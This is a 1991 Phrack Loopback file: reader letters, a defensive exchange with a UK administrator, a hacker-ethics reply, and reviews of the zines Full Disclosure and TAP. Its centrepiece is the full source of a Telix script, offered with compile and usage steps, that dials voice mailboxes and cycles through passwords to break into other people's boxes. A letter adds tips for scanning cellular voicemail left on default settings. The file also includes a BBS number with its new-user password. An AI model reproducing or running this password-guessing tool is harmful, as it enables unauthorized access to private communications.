==Phrack Inc.== Volume Three, Issue Thirty-five, File 2 of 13 [-=:< Phrack Loopback >:=-] By Phrack Staff Phrack Loopback is a forum for you, the reader, to ask questions, air problems, and talk about what ever topic you would like to discuss. This is also the place The Phrack Staff will make suggestions to you by reviewing various items of note; magazines, software, catalogs, hardware, etc. ______________________________________________________________________________ What's on Your Mind ~~~~~~~~~~~~~~~~~~ :: Hacking VMB's :: From: Mr. Upsetter To: phracksub@stormking.com Subject: Phrack 34 VMB article The article in Phrack 34 on voice mail hacking by Night Ranger was really good. It reminded me of some experiences I had with a cellular voice mail system a couple years ago in San Diego. I would bet there are similar systems in other cities. These VMB's would automatically answer calls when the subscriber wasn't on the air. They worked just like standard VMB's. To access the box, the owner could dial his or her own cellular number, then hit * when it answered. Then the VMB would ask for a password. Guess what the default password was? None! That meant all you had to do was dial up a cellular VMB and hit *, and you were in. How many VMB's still had the default password? About half... To scan for cellular VMB's all you had to do was dial numbers in the cellular prefix. It was pretty fun...almost too easy. Cheers, Mr. Upsetter - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >From: Zoso Puda > >After reading PHRACK 34 I thought it was good. Especially the article on VMB >hacking. As a matter of fact I wrote a SALT script to help me do it. This is exactly what we like to see. People actually getting basic information and building on it. - - - - - - - - - - - - - - - - - - - - - - - - - - - +-------------------------------------+ | ZoSoft Telix VMB Hacker | | | | written by: Zoso Puda | +-------------------------------------+ First words ----------- After reading Night Ranger's article (see PHRACK 34), I decided to make a VMB hacking program. Night Ranger provided good insight into how to hack VMB systems but some VMBs are hard to crack. What I came up with is a program to help me hack some of the harder systems. The ones that don't use the defaults are tough. Also my phone has the buttons and earpiece in one unit and I had to dial then put the phone to my ear and listen, look at the buttons to dial a number and put the phone back to my ear to listen. It soon became tiresome. What I finally came up with was a program to let me run all the phone functions from the keyboard. My modem speaker is loud enough to hear clearly so it seemed like the perfect thing to do. I also automated certain features like incrementing the password or box number. The program is not fully automated however. You must run this program manually. It's main purpose is to allow you to run normal phone functions via the keyboard. If you cannot hear clearly through your modem speaker then pick up the phone after the program dials the VMB phone # and hang up the phone before hanging up the modem. What follows is a brief description on how to use the program, compile the program, and run the program. A working knowledge of VMB systems is expected. Parameter details ----------------- VMB phone number : If you don't know this, give it up. Setup sequence : This code is used for systems that require a '9' or '#' or '*' to be pressed before the box number. Up to 3 characters can be in this string. Valid Box # : This would be a known valid box or the box you will be attempting to hack. This value remains constant. Codefile filename: You may use a file to get 'default' or your favorite passwords from. You must include the extension. Starting box/code: Box # or code to start checking. This value will increase automatically upon pressing [F7]. Using the function keys ----------------------- [F1] Dials the VMB system (see params). [F2] Hangs-up the modem. [F3] Closes the current codefile.(see params). [F4] Lets you set the current code/box #. [F5] Dials the Setup sequence (see params). [F6] Dials the current code. [F7] Makes the next code current. [F8] Dials the valid box (see params). [F9] Allows you to re-set the parameters. [F10] Hangs-up and quits the program. [0 - 9] These keys will dial 0 - 9 respectively. [*, #] These keys will dial * and #. [/] Used as a substitute # for the keypad. Basic Insructions ----------------- Codefiles should be stored in the same directory as your Telix program. A sample codefile should look like this: 1111 2222 3333 etc... I suggest you make seperate codefiles for the number of digits in each code. For example, all 3 digit codes should be in a file called 3DIGIT.COD, or something similar. During parameter entry, if you enter a codefile and it exists, you will NOT be prompted for a 'Starting box/code'. When the codefile is finished, the current code will set itself to 1000. If you enter a blank for the codefile or the name you entered doesn't exist then you will be prompted for a 'Starting Box/Code'. Compiling --------- Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file VMBHACK.SLT into the directory where your Telix scripts are. Compile using CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press Alt-G followed by the program name (VMBHACK). //---------------------------------------------------------------- // ZoSoft VMB Hacker Version 1.4 // Code by: Zoso, November 1991 // // See PHRACK 34 for more information on VMB systems. // // NOTE: Do not remove the credits of the original author, modified versions // you may add credits, but please do not remove any. // str code[10], // Global Variables codes[10], reset[1], vmb_number[15], borc[1], valid[10], setup[3]; str filename[12], fstatus[10]; int f; int fflag = 0; init_modem() // Modem initialization { cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on cputs("^M"); // some modems, you may have to waitfor("OK",20); // alter this. See you modem manual. } vmb_dial(str string) // Dial function { str workstr[20]; workstr = string; strcat(workstr,";"); cputs("ATDT"); cputs(workstr); cputs("^M"); cputs("^M"); } hang_up() // Hang Up function { hangup(); waitfor("",20); cputs("ATH0"); cputs("^M"); cputs("^M"); clear_scr(); display(); } next_code() // Next code function { int cd; if (fflag) { if (not feof(f)) // Check for file first { fgets(code,10,f); return; } if (feof(f)) { file_close(); code = "999"; goto NEXTCODE; } } NEXTCODE: cd = stoi(code); cd = cd + 1; // This line determines how the code itos(cd,code); // gets incremented. } set_code() // Enter new code { gotoxy(65,2); gets(code,10); } parameters() // Set parameters { str c[1]; file_close(); GETINFO: clear_scr(); printsc("VMB Hacker Parameters^M^J"); printsc("^M^JVMB phone number :"); gets(vmb_number,15); printsc("^M^JSetup sequence :"); gets(setup,3); printsc("^M^JValid box # :"); gets(valid,10); printsc("^M^JCodefile filename :"); gets(filename,12); if (filename != "") { open_file(); next_code(); } if (not fflag) { filename = "N/A"; printsc("^M^JStarting box/code :"); gets(code,10); } printsc("^M^J^M^JCorrect? (Y/n):"); gets(c,1); if (c == "n" || c == "N") goto GETINFO; } press_enter() // Pause routine { str a[1]; pstraxy("Press [ENTER] to continue...",20,23,11); gets(a,1); } title_scr() // Title screen { str i[1]; TITLE: clear_scr(); pstraxy(" - ZoSoft VMB Hacker V1.4 -",20,4,11); pstraxy("written for Telix by: Zoso Puda",20,6,14); press_enter(); } display() // Display screen { box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19); pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31); pstraxy("VMB Number:",4,2,31); // Information display pstraxy(vmb_number,16,2,27); pstraxy("Valid #:",33,2,31); pstraxy(valid,42,2,27); pstraxy("Current:",57,2,31); pstraxy(code,66,2,27); pstraxy("Codefile:",6,4,31); pstraxy(filename,16,4,27); pstraxy("File status:",29,4,31); pstraxy(fstatus,42,4,27); pstraxy("Setup sequence:",50,4,31); pstraxy(setup,66,4,27); box(0,6,78,10,4,0,103); // Function key display pstraxy("[ ]",30,6,111); pstraxy(" 0 - 9,*,#",31,6,110); pstraxy("[ ] Dial VMB", 2,7,111); pstraxy("F1", 3,7,110); pstraxy("[ ] Hang up",22,7,111); pstraxy("F2",23,7,110); pstraxy("[ ] Close file",42,7,111); pstraxy("F3",43,7,110); pstraxy("[ ] Set Current",61,7,111); pstraxy("F4",62,7,110); pstraxy("[ ] Setup seq.",2,8,111); pstraxy("F5", 3,8,110); pstraxy("[ ] Dial current",22,8,111); pstraxy("F6",23,8,110); pstraxy("[ ] Next box/code",42,8,111); pstraxy("F7",43,8,110); pstraxy("[ ] Valid box",61,8,111); pstraxy("F8",62,8,110); pstraxy("[ ] Parameters",22,9,111); pstraxy("F9",23,9,110); pstraxy("[ ] QUIT",41,9,111); pstraxy("F10",42,9,110); gotoxy(0,11); } quit_vmb() // End program { file_close(); hangup(); waitfor("",20); clear_scr(); printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J"); cputs_tr(_mdm_init_str); // Restore modem params } open_file() // Open Codefile { fflag = 1; f = fopen(filename,"r"); fstatus = "OPEN"; if (ferror(f)) file_close(); } file_close() // Close Codefile { fflag = 0; fclose(f); fstatus = "CLOSED"; } main() // MAIN program module { int chr; title_scr(); parameters(); clear_scr(); display(); init_modem(); TOP: gotoxy(0,11); chr = inkeyw(); if (chr == '0') vmb_dial("0"); // Dial 0-9 if (chr == '1') vmb_dial("1"); if (chr == '2') vmb_dial("2"); if (chr == '3') vmb_dial("3"); if (chr == '4') vmb_dial("4"); if (chr == '5') vmb_dial("5"); if (chr == '6') vmb_dial("6"); if (chr == '7') vmb_dial("7"); if (chr == '8') vmb_dial("8"); if (chr == '9') vmb_dial("9"); if (chr == '#') vmb_dial("#"); // Pound sign (#) if (chr == '/') vmb_dial("#"); // Make (/) same as (#) for keypad if (chr == '*') vmb_dial("*"); // Asterisk (*) if (chr == 15104) // F1 vmb_dial(vmb_number); if (chr == 15360) // F2 hang_up(); if (chr == 15616) // F3 { file_close(); display(); } if (chr == 15872) // F4 { set_code(); display(); } if (chr == 16128) // F5 vmb_dial(setup); if (chr == 16384) // F6 vmb_dial(code); if (chr == 16640) // F7 { next_code(); display(); } if (chr == 16896) // F8 vmb_dial(valid); if (chr == 17152) // F9 { hang_up(); parameters(); display(); } if (chr == 17408) // F10 { quit_vmb(); goto END; } goto TOP; END: prints("^M^J"); } //------------------------------------------------ ______________________________________________________________________________ :: More Legal Stuff :: >From: "Michael Lawrie, Operations" >Subject: RE: Who/What is this? > >In this country, the receipt of documents like this would probably be >pretty helpful in sending a person down on a conspiracy to contravene >a section or more of the Computer Misuse Act, I do not appreciate crap >like this appearing on my machine but since you didn't send it me, I >can't really moan at you - What I would appreciate though is if you >told people that forwarding it to people who don't want it is probably >not a good idea, unless you want all your list members locked up in >some pokey British gaol that is! > >Michael Lawrie. >--- >Michael Lawrie, Hicom Group Security - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sir, You will have to excuse my ignorance of telecom laws in other countries. In the United States, distribution of technical information such as Phrack Inc. is protected by law. Hackers are not involved in conspiracies or plots. Most hackers could care less about politics. Hackers are interested in the progression of technology and learning about how our advanced society works. The inefficient structure known as government is the last thing most hackers are interested in exploring. Phrack Inc. has no "membership." Phrack Inc. is an electronically distributed publication. It is like any other security oriented newsletter. Have you ever heard of "Computer Security Journal", "Computers and Security", or "Computer Crime Digest?" These are some of the "security industry" publications that are read in the U.S. Phrack Inc. merely has a little different flavor to it. If you are interested in seeing any of these printed journals, I can forward their address to you. I am sorry if you received Phrack Inc. and didn't wish to read it. You might wish to take the matter up with the person that forwarded it to you. I hope it wasn't too big of an inconvenience for you to delete the mail message containing Phrack Inc. Cheers, Dispater - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - After a (as it turns out not so private) conversation with Torq, it seems this guy isn't even an admin anywhere. He just likes to pretend he is. Did my reply end this little debate? NOT! This person had the nerve to intercept my private mail to Torq and then proceeded to bitch about it some more. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >From MICHAEL@hicom.loughborough.ac.uk Sat Nov 9 09:45:53 1991 Date: Fri, 8 Nov 91 13:19 GMT From: "Michael Lawrie, Operations" To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>> Subject: The EFF. I found the following message the other day, whilst routing around, I am to assume you lied to me about taking him off the list but for now we'll forget that. > From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991 > Date: Wed, 23 Oct 91 01:41:47 -0400 > From: phracksub@stormking.com > Message-Id: <::::::::::::::::::::::> > To: torq@::::::::::::::: > Subject: Phrack > > This guy sounds like a total idiot. If he does kill your account or something > stupid, get a hold of the EFF. They went to bat for someone who had their > account revoked because he/she had issues of Phrack on their directory. > > people should get a clue.... > > Dispater > phracksub@stormking.com As you say, people should get a clue. Are you assuming that 'torq' is perhaps American and as such has his rights protected by constitution? He isn't, he is British and doesn't really as such have much going for him. If I want to kill his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack' is not breaking any laws because it does not show intent, it would be breaking my machine's regulations if it came here. I would enjoy the EFF to come 'to bat' for Torq if I revoke his account for having issues of Phrack in his directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK that you know of? Regards... Michael. --- Michael Lawrie, Operations Group, Systems Development and Security. Mail: michael@uk.ac.lut.hicom (Span:19527::60478::lorry) [What pretentious signature?] (Inet: lorry@mit.edu) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From: Dispater To: MICHAEL@hicom.loughborough.ac.uk I never said I would delete him from the distribution list. I don't have to DO anything. Who the hell are you pretending to be anyway? You aren't the admin of MIT's gnu machine. >I found the following message the other day, whilst routing around, I am to >assume you lied to me about taking him off the list but for now we'll forget >that. Really? What the hell were you doing prowling though someone else's mail? I assume you did it without Torq's permission. I wonder if MIT would like to hear that some British hacker is rummaging around their machine? Your "finding" of our private e-mail might place you in criminal violation of the Electronic Communications Privacy Act of 1986. This is a federal law in the United States which protects the privacy of electronic communications. Your interception of our communications has violated our privacy. How would you like me to have a little chat with YOUR supervisor? Why you care about what takes place on the MIT computer which is located here in the USA? In this country freedom of speech is a right granted to all its citizens. The previous publisher of Phrack had to go to Federal Court to prove it and he succeeded. Phrack Inc. is 100% legal here and there is not one damn thing you can do about it! Dispater ______________________________________________________________________________ :: Hacker Philosophy :: From: The Dark Lord Sarik Malthus Organization: Underground Computing Foundation > I'm curious...now, don't think I am trying to judge you, or your > actions, or anything...but I am wondering how you, in your mind, justify the > actions of hackers and the kind of information provided by your magazine? I don't. I think people spend too much time attempting to justify their "morality." I don't play that guilt trip. I only seek information. Information has no morality. It is simple and pure, just like truth. I do feel that with knowledge comes responsibility not to use it in a destructive way. This is why I will not print "how to make bomb" files in Phrack Inc. Explosives are made for one thing and it doesn't involve too much creativity. People can get that type of stuff elsewhere. I have never damaged any system or hurt any individual financially. Carding is unquestionable robbery. If you know the person you are carding from, that is revenge and is a different category, as far as I am concerned, but it still doesn't make it right. Besides, any poser with half a brain can pull a CBI. That doesn't demonstrate much talent to me. I admit I went through the c0deZ phase, but I moved onto better things. I guess your basic question may boil down to, "Why hack?" I see the internet and the telecom world in as the latest frontier to be explored. If you look back at how this country started, you will see that it was explored by people who probably had a similar mentality to that of hackers. We want to test ourselves. We want to have a broad range of different experiences in our lives. We are not content with ignorance of the unknown. And, to some extent we are sick of our current society's norms. With that in mind we leave the security of what is considered acceptable at times. I guess I have a lot of different unpopular views....oh well. _______________________________________________________________________________ A Review of: ~~~~~~~~~~ Full Disclosure #23 - a publication For Truth, Justice, and The American Way ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Full Disclosure Subscription Rates: P.O. Box 903-FD23 U.S - 12 issues for $18.00 Libertyville IL 60048 24 issues for $29.95 No Canadian orders, please! by:Twisted Pair About a month ago I mailed in a coupon I got from friend in order to get a sample issue of Full Disclosure. Within a week I received Issue #23. It's got articles on fax interception, dumpster diving, computer security tips, surveillance tips, technical stuff, mail surveillance, etc. The Fax Interception article was most interesting to me. I've often wondered just how easy it could be to intercept faxes. Its all explained in the article. Here's some text from the article: | False Sense of Security: | | With the widespread proliferation of fax machines came increased use. | In general, a document transferred has been given the same sort of | validity as one sent or received by the U.S. Mail.* In general, such | communications were originally secure. Now that interception equipment is | available, the | sense of security has become false. *Note: Just this month, the FCC has stopped accepting paperwork with faxed signatures on them. Their new policy states that they only accept original signatures. How could the average Phrack reader start intercepting faxes? Use a standard fax machine hooked up to someone's line? Naaah. Wouldn't work. The handshaking routine between the two corresponding fax machines would be screwed all to hell if you threw a third machine into the mix. Full Disclosure claims to have successfully nabbed faxes with another method. They've pointed out this assertion with a photo on their front page of a "fax". It was supposedly intercepted from the FBI. It shows a computer screen with an FBI "FAX" on it. It looks more like the photo was made with some cutting and pasting at the neighborhood PIP store. Maybe they should have added the caption "Simulated Picture" to their front page. They recommend using IBM PC fax boards to intercept faxes. You'd need "sophisticated" software that would ignore the handshaking sequences between the two fax machines you're spying on. The IBM would just save all the page information and ignore the protocol information transmitted. Back to the article.... | Cellular phone-based fax machines provide ripe opportunity for "hacker" | intercepts, since the signal is available via low cost police scanners.* | No physical connection to a common carrier network is necessary. There is | absolutely no risk of being detected. *Note: That should read MODIFIED police scanners. See any of the ads in "Nuts & Volts" for a book on doing this. Discussed in the article is something called Broadband Interception. Commercial fax interception equipment can be hooked up to monitor satellite link traffic. One unit can decode up to 150 simultaneous fax transmissions from a 6,000 phone line satellite link. Next, all the consequences of forged faxes are discussed. People have become so reliant on fax technology that they incorrectly assume that anything that "comes over the fax" must be legitimate. Forgers find faxing much simpler than trying to make a "real" document. The trouble of altering postmarks and signatures is bypassed. All they need now is scissors and tape to make any "legitimate-looking" document needed. In their next issue, they further discuss fax interception and all the implications of sending sensitive info by fax. | Fax Intercept Suppliers | (The sale and/or use of fax interception equipment may be | restricted by State and Federal law) | | Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444; | Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316; | El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673; | [Many others listed] Oh, here's an ad from Full Disclosure. It's a business card run: ______________________________________________________ | | | | | Unix Systems Specialists Available July 10, 1992 | | | | | | L E N R O S E | | | | | | Convicted "Hacker" | | | and | | | Computer Consultant | | | 799 Royal St. Geore #105 | | | Naperville, IL 60563 (708) 527-1293 | | |______________________________________________________| Since you might want to check out a copy of Full Disclosure for yourself, I'll include their address and stuff. The issue I had was 16 pages long, half-newspaper size. ______________________________________________________________________________ A Review of TAP #105 ~~~~~~~~~~~~~~~~~~~ TAP Magazine Subscription Rates: PO Box 20264 10 issues for $10.00 Louisville KY 40250-0264 by Dispater Around March of 1991 I mailed in my $10. for a subscription to TAP Magazine. Promoted as "the oldest hacker magazine" and "created by Abbie Hoffman." I still, to this day, have not received ONE issue for my money. While attending CyberView '91, I met Predat0r and gave him $5.00 for a few back issues consisting of #97, #100 through issue #104. I was later given a complimentary issue of #105. After asking about #98 & #99, Predat0r said that he wasn't going to give those out because of some bullshit with Aristotle. Whatever...I still don't see why we couldn't see it. Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular, but it wasn't bad either. The issue was 18 pages long. For those of you who have never seen it, TAP contains information on hacking and phreaking as well as some political commentary. The articles are always diverse and interesting. TAP #105 contained information about the DNA Box. This is basically cellular phone phreaking. It was very good and quite detailed. There were also schematics of bugs and a flow chart explaining the incident initiation sequence of the E-911 system. This issue of TAP was sprinkled with some neat advertisements and news clippings (as usual) and wrapped up with a file about Blue Boxing. The price of $10.00 for 10 issues is worth it, but read on... Last week I asked Predat0r what was going on with TAP magazine. He told me that he had the material for the next three issues, but his copier or some other equipment was broken. This is an excuse I have heard before. Whether it is a valid excuse or not, only he knows. Since issue #105 (June) there has been not one issue of TAP. If you have ordered a subscription prior to July and not received anything, I highly suggest you write to Predat0r. The material contained in TAP is good and very much worth the price. (Especially compared to 2600 Magazine) However, I find that the general management of TAP to be poor, at this time, and therefore I highly recommend that you NOT send your $10 to TAP Magazine. Considering the amount of advertisements that we have all seen by TAP (in magazines such as Mondo 2000, 2600, etc.) in the past year, there is no excuse for the non-existent service that has transpired. Predat0r is a good sysop and needs to manage TAP as he does his BBS. I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP: COLUMBIAN COKE. I really don't like to be so critical, but I know some people I've talked to are feeling ripped off. This is why I wrote this. I truly hope that TAP can get out of this slump. _______________________________________________________________________________